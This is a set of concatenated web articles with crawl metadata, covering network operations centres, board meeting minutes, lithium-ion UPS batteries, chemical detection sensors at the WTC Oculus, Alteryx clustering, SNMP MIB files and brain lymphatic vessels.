needed to keep communities – and firefighters – safer.
<urn:uuid:32208a33-bcc9-4085-b101-8cffb5894916>
CC-MAIN-2022-40
https://blog.motorolasolutions.com/en_us/the-modern-flyerfighter-how-fire-departments-use-drones-to-fight-fire/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00278.warc.gz
en
0.939044
590
3.234375
3
The role of the NOC Bear in mind that the goal of the NOC—also known as the NMC, or network management centre—is to supervise, operate, and maintain the network and security infrastructure, based on the company’s needs. The following are among its main tasks: - Administering and supervising the IP network, which includes all technological equipment, such as servers, switches, routers, firewalls, desktop and laptop computers, storage systems, IP surveillance, and any other device with an IP address - Producing activity reports - Managing backups - Implementing and controlling the architecture What makes a NOC effective Here are some of the characteristics of a good NOC: - An effective NOC controls the IT infrastructure in real time, detects problems and observes their status changes thanks to its diagnostic tools. In practice, each network device connects to a central manager at fixed intervals to provide essential statistics about its status. This is a proactive way of ensuring that problems with the network are detected, reported and resolved before they can have a significant impact on the company. This is often done through a ticketing system when it comes to managing problems not identified or resolved upstream. - To constantly maximize uptime, the NOC monitors the network’s availability status. It usually has a log storage, analysis and reporting system, and can generate availability reports. - It assists administrators on first request. - It allows the technical staff in charge to maintain the integrity of the data during transfers between the user and the database. - It generates activity reports from the collected data thanks to its data collection and measurement tools. - It integrates expert recommendations on possible improvements. To optimize its efficiency, the NOC must therefore possess several levels of redundancy in terms of physical infrastructure, logical security and access control, as well as software that makes it possible to monitor the network with precision. It also requires a high level of expertise and an understanding of the various technological platforms. A good Network Operations Centre is essential to keeping a network functioning at its maximum capacity.
<urn:uuid:d722798a-666e-45ff-ac8c-09f090000219>
CC-MAIN-2022-40
https://www.r2i.ca/en/article/network-operations-centre-best-practices/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00278.warc.gz
en
0.941819
426
3.03125
3
Far from minute taking being merely an administrative task, meeting minutes are an important record of the discussions, decisions, actions and responsibilities that are agreed upon when the board convenes. They are a pillar of evidence of good governance and serve to demonstrate that directors are actively engaged and focused on performing their fiduciary duties. Board meeting minutes form part of the corporate record and can be cited in court in the event of a legal dispute involving the company or its directors. Thus, it’s important that they are of a clarity and quality that can stand up to scrutiny. The Department for Education is just one recent example where inaccurate or incomplete board minutes have been publicly criticised and offered as evidence of poor overall governance. The DfE published minutes that included “some updates amounting to no more than a ten-word sentence” which, said critics, showed the department’s lack of transparency. Organisations can be compelled to release board meeting minutes as part of Freedom of Information (FOI) requests by members of the public or the press, as happened in the case of the DfE. It’s clear, therefore, that the regularity with which board minutes find their way into the public domain means that it is a matter of sound governance to ensure that they can be accessed when needed and are fit for purpose. So, what are the legal requirements for board meeting minutes in the UK and how can technology be leveraged to make sure that they are an available, accurate record and provide sufficient evidence of the board’s activities? The legal position – record and retain In fact, there is relatively little legislative detail on the subject of board meeting minutes. Section 248 of the Companies Act 2006 simply states that minutes must be taken at all board meetings and retained for a minimum of 10 years. Beyond this statutory requirement, there is an understanding that minutes should form an accurate record of the meeting that is agreed upon by all who were present. While they should not be a transcription of the proceedings, minutes must contain sufficient detail to enable an external reviewer to understand the process by which directors arrived at a decision. The digital filing cabinet and the importance of accessible archives As stated above, board meeting minutes must be kept for a minimum of 10 years. Until the mid-1990s, storing meeting minutes simply meant putting a copy into a filing cabinet, but the information revolution naturally means that company records are increasingly stored in digital archives. This throws up some interesting issues around document management best practice, security, future accessibility and file integrity. As a minimum: - Storage of board minutes should be secure and stable. Only those who are authorised should have open access to the files. - Storage should be centralised; minutes shouldn’t sit on the board administrator’s hard drive. - Files should be backed up regularly as part of the organisation’s disaster recovery protocol. Minutes should be accessible to directors for review and reference, as required. Discover how Diligent’s Minutes module can make your minutes work harder for the board. There’s a reason that paper was the recording format of choice for thousands of years. It’s easy to come by, it’s relatively stable and you generally only need a pair of eyes to view it. The digital age brings with it a host of challenges when it comes to archiving and accessibility. As file formats and storage systems evolve, organisations must ensure that board meeting minutes are subject to robust archiving procedures so that today’s records can be successfully accessed in the future. How many meeting minutes, for example, are even now languishing on floppy disks with no device to access them? And if that possibility has you shaking your head, it is worth remembering that legacy technology is a problem that affects more than just company boards: According to the US Government Accountability Office, the US nuclear program was still being run using eight-inch floppy disks until last year. Leveraging digital transformation to support the boardroom The days of elegant shorthand are, alas, behind us. The majority of board administrators now input minutes directly into their laptops. This has the natural benefit of speed and eliminates the need to translate shorthand notes and to retype documents. The next step is to take advantage of board portal solutions that combine the convenience of digital minute taking with centralised, secure storage and shareability. Using templates that automatically draw in agenda items creates an instant structure around the minutes which guarantees logic and readability. It also frees up the board administrator’s time to focus on recording accurate minutes with sufficient detail to satisfy an external reader of the substance and process of discussions. This demonstrates the good governance that anyone scrutinising the minutes will need to see. Once the minutes have been entered, it is then a swift task to check and edit them and share them with directors for review and clarification. A secure board portal that’s available 24/7 means directors can fulfil their task whenever it suits them. A digital system also allows for the assigning of actions to individuals and committees, with reminders that can help to keep directors engaged and on track. In this way, digital transformation can empower the boardroom, saving time, increasing accuracy and ensuring that the organisation is prepared should its board minutes come under scrutiny. Board Portal Buyer’s Guide With the right Board Portal software, a board can improve corporate governance and efficiency while collaborating in a secure environment. With lots of board portal vendors to choose from, the whitepaper contains the most important questions to ask during your search, divided into five essential categories. December 28, 2020 What Role Does the Board Play in Business Continuity Planning? Continuing in the face of adversity has been the dominant theme of the past year. When the scale of disruption caused by COVID-19 became clear, businesses worldwide were forced to adapt rapidly to the restrictions that came into force overnight. While many organisations have business continuity plans designed to keep… December 21, 2020 Business Continuity Plan Maintenance: A Step-by-Step Guide A business continuity plan (BCP) is a living, evolving document. Designed to be activated when unplanned disruption strikes, it must be flexible enough to guide actions regardless of the specifics of the situation. In a fast-changing environment, business continuity plan maintenance is an essential part of the business continuity programme… December 8, 2020 Board Meeting Minutes Best Practices and Guidelines Guidelines for Board Meeting Minute Taking In order to keep the courtroom from invading the boardroom, the most basic rule is, “saying less is often better,” warns the London-based law firm Bricker & Eckler in a recent note. “Today’s business climate places heightened…
<urn:uuid:08808931-5fe1-41fe-8357-f68dc32a228c>
CC-MAIN-2022-40
https://www.diligent.com/en-gb/blog/uk-board-meeting-minutes-stand-security-scrutiny/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00278.warc.gz
en
0.945805
1,384
2.640625
3
In the context of a data center, it is hard to be hyperbolic when describing an event as a “disaster.” An event as commonplace as a spring thunderstorm can be enough to wreak havoc: flooding, fallen trees, lightning strikes, and power outages are all possible. One ever-increasing threat to the data center environment is grid stability. In the last 30 years, grid-level power outages in the United States have increased nearly 300%, with over 3,600 blackouts costing American businesses $150 billion dollars in 2014. Aging infrastructure, increased power demand, and more erratic weather systems will cause those numbers to continue to rise. Hardening your data center against power loss is critical to maintaining up-time. BRIDGING THE GAP When auditing the disaster recovery plan of a facility, the ability to survive a loss of power is crucial. Most facilities with critical equipment will be equipped with an emergency generator sized to run critical equipment for the desired time, usually at least an hour. However, gensets — particularly those large enough to back up an entire facility — can take 60, even 90 seconds to come online. The power supplies on the front ends of a typical server are only designed to have 12 milliseconds of ride-through time. Uninterruptible power supplies (UPS), which are often provisioned solely for back-up power, are increasingly being deployed as ride-through devices. Both line interactive and double conversion UPS equipment can provide AC via the battery well under the 12 milliseconds of ride-through on the power supply of a server. When sized correctly, a UPS can be the perfect device to cover both short-term power dips and blips, as well as longer outages that require a genset. TRUSTING YOUR POWER LOSS PLAN Given the ever-increasing number of outages, it is important to not only deploy the equipment required to survive an outage, but to ensure that it is working properly. Disaster preparedness advisors typically recommend testing power back-up equipment on a monthly basis and running at expected full load on a quarterly basis. For a UPS, this means running a battery test. A battery test can be scheduled through the standard interface of most UPSs. The test entails discharging the battery and comparing actual capacity to expected or nameplate capacity. One caveat to the recommendation to regularly test a UPS battery is that the very test designed to provide state of health will actually degrade battery state of health in lead-acid systems. UPSs designed with new lithium-ion battery technology have up to 300% the cycle life of lead-acid batteries at deep discharge. In addition, lithium-ion batteries have integrated battery monitoring, meaning battery voltage and capacity can be measured and reported in real-time without requiring a full discharge-charge cycle. This translates to the UPS battery remaining at or near full charge all of the time, thus reducing risk associated with an outage overlapping with a back-up system test. A BETTER BATTERY FOR THE JOB Lithium-ion batteries offer other advantages in the event of an outage. Lithium-ion has three times the energy density (by both weight and size) of lead acid and nearly identical cycle life whether utilizing the UPS battery at 30% depth-of-discharge or 80% depth-of-discharge. These two characteristics combine in very meaningful ways for a data center manager looking to mitigate power outage risk. First, a lithium-ion battery for a given power and duration requirement can be much smaller than a lead acid battery deployed in the same application. Not only does the lithium-ion battery pack more energy into a smaller package, its tolerance for high depth-of-discharge means it has more usable capacity. A smaller UPS battery can be re-charged quickly and thus be primed and ready for repeat outages or power pulses. A more compact battery can also be deployed with or immediately adjacent to critical equipment. Rather than relying on large power runs from a centralized battery room, back-up power can be located directly in the rack. This lessens the risk associated with power transmission and reduces sheer square footage of a facility that must be monitored and neutralized. By extension of cycle-life independence from depth of discharge, lithium-ion batteries also demonstrate a low degree of capacity fade. This translates directly into a longer life for the UPS battery. LITHIUM-ION IN PRACTICE California serves as a prime location for many data centers and other critical infrastructure. Pacific Gas and Electric, the primary utility for the state of California, shows 83 power outages on its live service interruption website as this article is being written. Eaton’s annual Blackout Tracker reports 537 major outages experienced in 2014 — equivalent to an outage every 16 hours — with an average duration of 49 minutes. It is not a matter of if a data center will lose power; it is a matter of when. In order for a UPS to be a reliable, long-term asset in the battle against blackouts, it must have a high cycle life and low capacity fade. Consider an application in which 5 kW of equipment must be backed up for 90 seconds in outage-prone California. A comparison of this hypothetical 125 watt-hour battery can be made using commonly available battery data. Assuming 80% depth-of-discharge, a typical absorbent glass mat (AGM) lead acid battery would only last 0.9 years while a lithium-ion pack would last 3.7 years, or 300% longer. To prolong the life of the lead-acid battery, a less aggressive depth of discharge can be used, but will require the battery to be over-sized by 400% from a capacity standpoint. When translated into the physical realm, the results are more stark, as seen in Table 1. Of course, when sizing a UPS, margin for both size and run-time should be used to ensure proper functionality, but the underlying principle that lithium-ion batteries offer reduced risk and increased efficiency in the data center still holds. When preparing or even updating a data center disaster recovery plan, careful consideration of back-up power should be given. Having a UPS to provide power during short outages or while a genset is brought online will maintain uptime, even during non-ideal circumstances. Lithium-ion UPS batteries provide a longer lasting, more reliable solution that is compact enough to be deployed right where the equipment requiring back-up-is located, greatly reducing the overall risk from power outage at a facility. Emilie Stone is the general manager of Methode Active Energy Solutions located in Boulder, CO. She brings nearly a decade of experience in automotive design and manufacturing to data center equipment, helping engineer reliability and robustness.
<urn:uuid:5f4d14ef-ce7b-44c1-940c-ac71154f739c>
CC-MAIN-2022-40
https://www.missioncriticalmagazine.com/articles/87820-the-lithium-ion-ups
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00278.warc.gz
en
0.934446
1,386
2.703125
3
In the heart of New York City, a new magnificent architectural wonder in white, the World Trade Center Transportation Hub, also known as the Oculus, attracts tens of thousands of commuters and visitors every day. The Oculus, which opened last year, lives up to both meanings of its name—‘oculus’ from Latin means ‘eye’ and ‘opening’. On the inside, the ceiling is shaped like an eye with a horizontal pupil. On the outside, the empty space above the structure, an opening between skyscrapers, lets sunlight hit the memorial footprints of the Twin Towers during the fall equinox. (Learn More. Courtesy of CBS New York and YouTube. Posted on Mar 3, 2016) The Hub connects two subway systems and provides access to multiple buildings that make up the World Trade Center. However, even the most beautiful and useful places are not immune to danger from terrorist chemical attacks. To protect both the people and the World Trade Center Transportation Hub, the Department of Homeland Security (DHS) Science and Technology Directorate (S&T) entered into an agreement this spring with the Port Authority of New York and New Jersey to begin the design, establishment, operation and maintenance of a chemical detection testbed for identifying hazardous gases. A testbed is an environment where technology is positioned and tested. Together these institutions will examine the performance and effectiveness of already existing devices and will choose the most suitable ones for the Oculus. “The goal is to achieve independent detection by at least two different types of sensors in the event of an intentional release of a chemical dangerous to the public and employees in the Oculus,” said Don Bansleben, program manager in S&T’s Chemical and Biological Defense Division. The results from this testbed could be integrated into the Port Authority’s operational and emergency plans to enhance security and public safety measures. Intentional gas poisoning in public transportation dates back before 9/11. In 1995, a terrorist group called Aum Shinrikyo released self-made sarin nerve gas from a bag they left in a Japanese metro station. (Learn More. On March 20, 1995, Aum Shinrikyo, a religious cult based in Japan, used chemical weapons in a terrorist attack on Tokyo’s subway system. During the morning rush hour, five cult members carried bags of liquid sarin into Tokyo’s subway and pierced the bags with the tips of their umbrellas, allowing the deadly nerve agent to evaporate and spread. The attack killed twelve people and injured thousands more. Courtesy of the Council on Foreign Relations and YouTube. Posted on Mar 20, 2012) The gas killed 11 people and injured about 1,000. Chemicals, such as sarin gas, mustard gas and chlorine, a widely produced industrial chemical, have also been used in recent wars – the Iran-Iraq War in the 1980s and, most recently, in the Syrian conflict. Although nearly all countries in the world have signed a Chemical Weapons Convention treaty for prohibiting the production and usage of chemical warfare agents, “there is a concern that people can secretly make these types of deadly chemicals, and easily walk in the subway with a backpack and release them,” said Bansleben. “To save lives, the Port Authority is interested in protecting this very large space.” The Oculus is not the first place to be equipped with chemical sensors. U.S. public transportation spaces such as the Grand Central Terminal in New York City, and Washington, DC metro system have used such devices since the early 2000s. (Authorities released a mix of odorless, inert gases and tracer materials in three of the busiest subway stations in the city: Grand Central Terminal, Times Square and Penn Station, U.S. Department of Homeland Security officials said. Courtesy of Wochit News and YouTube. Posted on May 9, 2016) Hidden in nonobtrusive vented cabinets, chemical detectors are constantly sampling and scanning the air, looking for hazardous gases. S&T, who funds this project, contracted the Argonne National Laboratory to install chemical sensing technology in a fashion to achieve maximum coverage of the volume of the Oculus. To achieve more reliable detection, the Lab will install different types of sensors that use two different physical techniques—point and standoff. If both techniques independently confirm a dangerous chemical present in the area, authorities will be alerted that a hazard is present. Point detectors register only substances that are close to them. These detectors sample the air to look for hazardous gases using Ion Mobility Spectroscopy and compare them quickly to a library of chemicals. Standoff detectors cover large areas via an infrared laser using the analytical technique of Fourier Transform Infrared Spectroscopy. “For example, one of these sensors may be sending an infrared beam across a large space, and if the beam passes through a cloud of hazardous material, it may absorb the energy,” said Bansleben. “Every molecule has a fingerprint in the infrared region and will absorb energies at different frequencies; if there is a match, security would be alerted.” Sometimes cleaning chemicals may cause an alarm to go off because of a similarity in a physical property to a threat chemical. False alarms, if they were to occur often, are problematic because they may cause unnecessary evacuation and thus make the technology unreliable. “Combining multiple techniques is the best way to achieve protection and avoid false positives,” Bansleben said. If a sensor at a certain location identifies a hazard, it will alert the local operations center. Then the operators will notify security and, if needed, the Fire Department, First Responders, and the Police. If the authorities predict a wide spread of the chemical, they will evacuate the public immediately. The project started just after September 11 this year, and the detectors, which will not be in plain sight, will be tested in the Oculus for a period of 12 months under S&T’s guidance. This period allows the Argonne National Lab to see how accurately the devices work, analyze collected data, and work with detector vendors to improve the technology. After a year of successful testing, the Argonne National Lab will teach the Port Authority how to use the chemical detectors for another year. “The World Trade Center is something that has a lot of meaning for this country since 9/11,” said Bansleben. “We are proud to support and protect public transit systems from terrorism.” DHS Science & Technology Directorate (S&T) a Finalist in the 2017 ‘ASTORS’ Homeland Security Awards Program The 2017 ‘ASTORS’ Homeland Security Awards Program, is organized to recognize the most distinguished vendors of Physical, IT, Port Security, Law Enforcement, First Responders, (Fire, EMT, Military, Support Services Vets, SBA, Medical Tech) as well as the Federal, State, County and Municipal Government Agencies – to acknowledge their outstanding efforts to ‘Keep our Nation Secure, One City at a Time.’ As an ‘ASTORS’ competitor, DHS S&T is competing against the industry’s leading providers of Innovative Critical Infrastructure Protection Solutions. American Security Today will be holding the 2017 ‘ASTORS’ Awards Presentation Luncheon at 12:00 p.m. to 2:00 p.m, Wednesday, November 15th at ISC East, the Northeast’s largest security industry event, in the Jacob Javits Exhibition Center in New York City. At ISC East you will have the chance to meet with technical reps from over 225 leading brands in the security industry, allowing you to find out about new products and stay ahead of the competition. Encompassing everything from Video Surveillance and Access Control to Smart Home Technologies and Unmanned Security, you’re sure to find products and services that will benefit your company and clients. Good luck to DHS S&T on becoming a Winner of the 2017 American Security Today’s Homeland Security Awards Program! Please visit the New DHS S&T Mobilizing Innovation website at https://www.dhs.gov/xlibrary/SciTechMobilizingInnovation/index.html. Register today for the ‘ASTORS’ Homeland Security Awards Luncheon on November 15th, in New York City and give yourself & your clients a break from the show! The highlight of the 2017 AST Homeland Security Awards Program will be the ‘ASTORS’ Awards Presentation Luncheon at ISC East, in the Jacob Javits Exhibition Center from 12:00pm – 2:00pm. The luncheon will take place immediately prior to the ISC East Keynote Session featuring Ray Kelly, Former Commissioner of the NYPD, from 2:00pm – 3:00pm, in room 1A29. Ray Kelly, who is known for leading one of the world’s largest police departments through a time of heightened security risks, will discuss his development of the NYPD during the time immediately following 9/11, and will provide insights into today’s most pressing public safety and cyber threats, and how to protect against them. ISC East is the Northeast’s largest security industry event and your ‘ASTORS’ Awards Luncheon registration includes complimentary attendee access to the show. Already Exhibiting and/or Attending the 2017 ISC East Conference? Thank take advantage of this exclusive luncheon opportunity to take a break from the show – Invite your team, guests, clients and show visitors to a lovely and affordable plated meal event in the heart of New York City, for a fabulous networking opportunity! To register, click on the banner below, or go to https://americansecuritytoday.com/product/awards-luncheon/ 2017 ‘ASTORS’ Homeland Security Awards Program Sponsored by ATI Systems, Sharp Electronics, Automatic Systems America, Robotic Assistance Devices & More!
<urn:uuid:7c65634e-c233-4618-b9f7-1d1269547027>
CC-MAIN-2022-40
https://americansecuritytoday.com/chemical-detection-sensors-secure-nyc-oculus-transport-hub-videos/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00278.warc.gz
en
0.916544
2,085
2.984375
3
K-Centroids Cluster Analysis Tool K-Centroids represent a class of algorithms for doing what is known as partitioning cluster analysis. These methods work by taking the records in a database and dividing (partitioning) them into the “best” K groups based on some criteria. Nearly all the partitioning cluster analysis methods accomplish their objective by basing cluster membership on the proximity of each record to one of K points (or “centroids”) in the data. The objective of these clustering algorithms is to find the location of the centroids that optimizes some criteria with respect to the distance between the centroid of a cluster and the points assigned to that cluster for a pre-specified number of clusters in the data. The specific algorithms differ from one another in both the criteria used to define a cluster centroid and the distance measures used to define the proximity of a point in a cluster to that cluster’s centroid. Three specific types of K-Centroids cluster analysis can be carried out with this tool: K-Means, K-Medians, and Neural Gas clustering. K-Means uses the mean value of the fields for the points in a cluster to define a centroid, and Euclidean distances are used to measure a point’s proximity to a centroid.* K-Medians uses the median value of the fields for the points in a cluster to define a centroid, and Manhattan (also called city-block) distance is used to measure proximity.** Neural Gas clustering is similar to K-Means in that it uses the Euclidean distance between a point and the centroids to assign that point to a particular cluster.*** However, the method differs from K-Means in how the cluster centroids are calculated, with the location of the centroid for a cluster involving a weighted average of all data points, with the points assigned to the cluster for which the centroid is being constructed receiving the greatest weight, points from the most distant cluster from the focal cluster receiving the lowest weight, and the weights given to points in intermediate clusters decreasing as the distance between the focal cluster and the cluster to which a point is assigned increases. This tool uses the R tool. Go to Options > Download Predictive Tools and sign in to the Alteryx Downloads and Licenses portal to install R and the packages used by the R tool. See Download and Use Predictive Tools. Configure the Tool Use the Configuration tab to set the controls for the cluster analysis. - Solution name: Each cluster solution needs to be given a name so it can be identified later. Solution names must start with a letter and may contain letters, numbers, and the special characters period (".") and underscore ("_"). No other special characters are allowed, and R is case sensitive. - Fields (select two or more): Select the numeric fields to use in constructing the cluster solution. - Standardize the fields...: Select this option to choose to standardize the variables via either a z-score or unit interval standardization. - The z-score transformation involves subtracting the mean value for each field from the values of the field and then divided by the standard deviation of the field. This results in a new field that has a mean of zero and a standard deviation of one. - The Unit interval transformation involves subtracting the minimum value of a field from the field values and then dividing by the difference between the maximum and minimum value of the field. This results in a new field that has values that range from zero to one. Clustering solutions are very sensitive to the scaling of the data, particularly if one field is on a very different scale than another. As a result, scaling the data is something that should be considered. - Clustering method: Choose one of K-Means, K-Medians, or Neural Gas. - Number of clusters: Select the number of clusters in the solution. - Number of starting seeds: K-Centroids methods start by taking randomly selected points as the initial centroids. The final solution determined by each of the methods can be influenced by the initial points. If multiple starting seeds are used, the best solution out of the set of solutions is kept as the final solution. Plot Options Tab Use the Plot Options tab to set the controls for the plot. - Plot points: If checked, all points in the data are plotted, and represented by the cluster number each point is assigned to in the solution. - Plot centroids: If checked, cluster centroids are plotted, and represented by the number of the cluster for which it is the centroid. - The highest number of dimensions to include in biplots: A biplot is a means of visualizing clustering solutions (via principal components) in a smaller dimensional space. The dimension is done 2 dimensions at a time. This option sets the upper limit of the dimensions to use in the visualization. For example, if this parameter is set to "3", then biplots includes the first and second, first and third, and second and third principal components in 3 separate figures. Graphic Options Tab Use the Graphics Options tab to set the controls for the output. - Plot size: Select inches or centimeters for the size of the graph. - Graph resolution: Select the resolution of the graph in dots per inch: 1x (96 dpi), 2x (192 dpi), or 3x (288 dpi). - Lower resolution creates a smaller file and is best for viewing on a monitor. - Higher resolution creates a larger file with better print quality. - Base font size (points): Select the size of the font in the graph. View the Output Connect a Browse tool to each output anchor to view results. - O anchor: Consists of a table of the serialized model with the model name and the size of the object. - R anchor: Consists of the report snippets generated by the K-Centroids Cluster Analysis Tool: a statistical summary and cluster solution plots.
<urn:uuid:424cc4a0-db9a-49ef-9dd1-2a60ac869a65>
CC-MAIN-2022-40
https://help.alteryx.com/20221/designer/k-centroids-cluster-analysis-tool
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00278.warc.gz
en
0.892753
1,264
2.9375
3
The MIB, or Management Information Base, is an ASCII text file that describes Simple Network Management Protocol (SNMP) elements as a list of data objects. Think of it as a dictionary of the SNMP language - every managed object referred to in an SNMP message must be listed in the MIB. The fundamental purpose of the MIB is to translate numerical strings into human-readable text. When an SNMP device sends a message or "trap," it identifies each data object in the message with a number string called an object identifier, or OID. (OIDs are defined more fully later in this paper.) The MIB provides a text label called for each OID. Your SNMP manager uses the MIB as a codebook for translating the OID numbers into a human-readable display. Your SNMP manager needs it in order to process messages from your devices. Without the MIB, the message is just a meaningless string of numbers. Your SNMP manager imports it by compiling the raw ASCII text of the file into binary that the SNMP management system can understand. Because as far as SNMP managers and agents are concerned, if a component of a network device isn't defined in the MIB, it doesn't exist. For example, let's say you have an SNMP RTU (Remote Telemetry Unit) with a built-in temperature sensor. You think you'll get temperature alarms from this device - but you never do, no matter how hot it gets. Why not? You read the RTU's MIB file and find out that it only lists discrete points, and not the temperature sensor. Since the sensor isn't defined in the MIB, the RTU can't send traps with temperature data. As you can see, the MIB is your best guide to the real capabilities of an SNMP device. Just looking at the physical components of a device won't tell you what kind of traps you can get from it. You might think it's strange that a manufacturer would add a component to a device and not describe it in the MIB. But the fact is, a lot of devices have sketchy MIBs that don't fully support all their functions. When you're planning your SNMP monitoring, you need to be able to read MIBs so you can have a realistic idea of what capabilities you have. When you're evaluating new SNMP equipment, examine its MIB file carefully before you purchase. NetGuardian 832A SNMP RTU (Remote Telemetry Unit) Here are 5 essential features that your SNMP RTU (Remote Telemetry Unit) must have: You need to see DPS gear in action. Get a live demo with our engineers. Download our free SNMP White Paper. Featuring SNMP Expert Marshall DenHartog. This guidebook has been created to give you the information you need to successfully implement SNMP-based alarm monitoring in your network. Have a specific question? Ask our team of expert engineers and get a specific answer! Sign up for the next DPS Factory Training! Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today
<urn:uuid:adce4fd0-9f6b-4e46-9c5a-cc21d4433cab>
CC-MAIN-2022-40
https://www.dpstele.com/snmp/mib/white-paper/what-mib-manager.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00278.warc.gz
en
0.917694
677
3.296875
3
This course is designed to introduce and guide the user through the three phases associated with big data – obtaining it, processing it, and analyzing it. The Introduction to Big Data module explains what big data is, its attributes and how organizations can benefit from it. It also provides a snapshot of job roles, and available certification and training, in order to forge a career in big data. The Hadoop Fundamentals module explains how the Apache Hadoop environment is designed to store and process big data, and introduces Apache products such as MapReduce, YARN, Spark and Tez, while the Basic Analytics module provides an overview of different types of analytics and describes how organizations can benefit from them. The initial module is suitable for any IT professional needing an overview of big data and the benefits it can provide to organizations. Later modules are specifically aimed at Programmers, Administrators and Data Analysts needing to manage, process, and analyze big data. A basic understanding of the type of data used, and available within your industry. After completing this course, the student will be able to: - Describe the characteristics of Big Data - Identify the benefits of implementing a Big Data strategy - Explain how Hadoop is used to store, manage, and process Big Data - Identify the different types of analytics and describe how they are used Introduction to Big Data What is Big Data and how did it Evolve? Structured and Unstructured Data Big Data Attributes Big Data Lifecycle Big Data Infrastructure Job Roles, Certification, and Training for Big Data Careers The Purpose of Apache Hadoop Complimentary Apache Products Real-Life Hadoop Examples Hadoop in the Cloud Hadoop Distributed File System (HDFS) Using MapReduce to Process Big Data Hadoop and the Mainframe How Analytical Data is Used to Benefit Organizations Descriptive, Diagnostic, Predictive, and Prescriptive Analytics How Businesses are Using Analytics Batch and Real-Time Analytics Leading Analytic Solution Providers and their Products
<urn:uuid:233db241-d915-4d5e-b1eb-7640c7bd3b45>
CC-MAIN-2022-40
https://interskill.com/?catalogue_item=big-data-hadoop-and-analytics&noredirect=en-US
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00278.warc.gz
en
0.838818
497
2.890625
3
By scanning the brains of healthy volunteers, researchers at the National Institutes of Health saw the first, long-sought evidence that our brains may drain some waste out through lymphatic vessels, the body’s sewer system. The results further suggest the vessels could act as a pipeline between the brain and the immune system. “We literally watched people’s brains drain fluid into these vessels,” said Daniel S. Reich, M.D., Ph.D., senior investigator at the NIH’s National Institute of Neurological Disorders and Stroke (NINDS) and the senior author of the study published online in eLife. “We hope that our results provide new insights to a variety of neurological disorders.” Dr. Reich is a radiologist and neurologist who primarily uses magnetic resonance imaging (MRI) to investigate multiple sclerosis and other neurological disorders which are thought to involve the immune system. Led by post-doctoral fellows, Martina Absinta, Ph.D. and Seung-Kwon Ha, Ph.D., along with researchers from the National Cancer Institute, the team discovered lymphatic vessels in the dura, the leathery outer coating of the brain. Lymphatic vessels are part of the body’s circulatory system. In most of the body they run alongside blood vessels. They transport lymph, a colorless fluid containing immune cells and waste, to the lymph nodes. Blood vessels deliver white blood cells to an organ and the lymphatic system removes the cells and recirculates them through the body. The process helps the immune system detect whether an organ is under attack from bacteria or viruses or has been injured. In 1816, an Italian anatomist reported finding lymphatic vessels on the surface of the brain, but for two centuries, it was forgotten. Until very recently, researchers in the modern era found no evidence of a lymphatic system in the brain, leaving some puzzled about how the brain drains waste, and others to conclude that brain is an exceptional organ. Then in 2015, two studies of mice found evidence of the brain’s lymphatic system in the dura. Coincidentally, that year, Dr. Reich saw a presentation by Jonathan Kipnis, Ph.D., a professor at the University of Virginia and an author of one the mouse studies. “I was completely surprised. In medical school, we were taught that the brain has no lymphatic system,” said Dr. Reich. “After Dr. Kipnis’ talk, I thought, maybe we could find it in human brains?” To look for the vessels, Dr. Reich’s team used MRI to scan the brains of five healthy volunteers who had been injected with gadobutrol, a magnetic dye typically used to visualize brain blood vessels damaged by diseases, such as multiple sclerosis or cancer. The dye molecules are small enough to leak out of blood vessels in the dura but too big to pass through the blood-brain barrier and enter other parts of the brain. At first, when the researchers set the MRI to see blood vessels, the dura lit up brightly, and they could not see any signs of the lymphatic system. But, when they tuned the scanner differently, the blood vessels disappeared, and the researchers saw that dura also contained smaller but almost equally bright spots and lines which they suspected were lymph vessels. The results suggested that the dye leaked out of the blood vessels, flowed through the dura and into neighboring lymphatic vessels. To test this idea, the researchers performed another round of scans on two subjects after first injecting them with a second dye made up of larger molecules that leak much less out of blood vessels. In contrast with the first round of scans, the researchers saw blood vessels in the dura but no lymph vessels regardless of how they tuned the scanner, confirming their suspicions. They also found evidence for blood and lymph vessels in the dura of autopsied human brain tissue. Moreover, their brain scans and autopsy studies of brains from nonhuman primates confirmed the results seen in humans, suggesting the lymphatic system is a common feature of mammalian brains. “These results could fundamentally change the way we think about how the brain and immune system inter-relate,” said Walter J. Koroshetz, M.D., NINDS director. Dr. Reich’s team plans to investigate whether the lymphatic system works differently in patients who have multiple sclerosis or other neuroinflammatory disorders. “For years we knew how fluid entered the brain. Now we may finally see that, like other organs in the body, brain fluid can drain out through the lymphatic system,” said Dr. Reich. Materials provided by NIH/National Institute of Neurological Disorders and Stroke. Note: Content may be edited for style and length. - Martina Absinta, Seung-Kwon Ha, Govind Nair, Pascal Sati, Nicholas J Luciano, Maryknoll Palisoc, Antoine Louveau, Kareem A Zaghloul, Stefania Pittaluga, Jonathan Kipnis, Daniel S Reich. Human and nonhuman primate meninges harbor lymphatic vessels that can be visualized noninvasively by MRI. eLife, 2017; 6 DOI: 10.7554/eLife.29738
<urn:uuid:5c2c61c3-849d-4605-ad6f-f44f0f926362>
CC-MAIN-2022-40
https://debuglies.com/2017/10/04/first-evidence-of-the-bodys-waste-system-the-human-brain-discovered/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00278.warc.gz
en
0.933716
1,120
3.5625
4
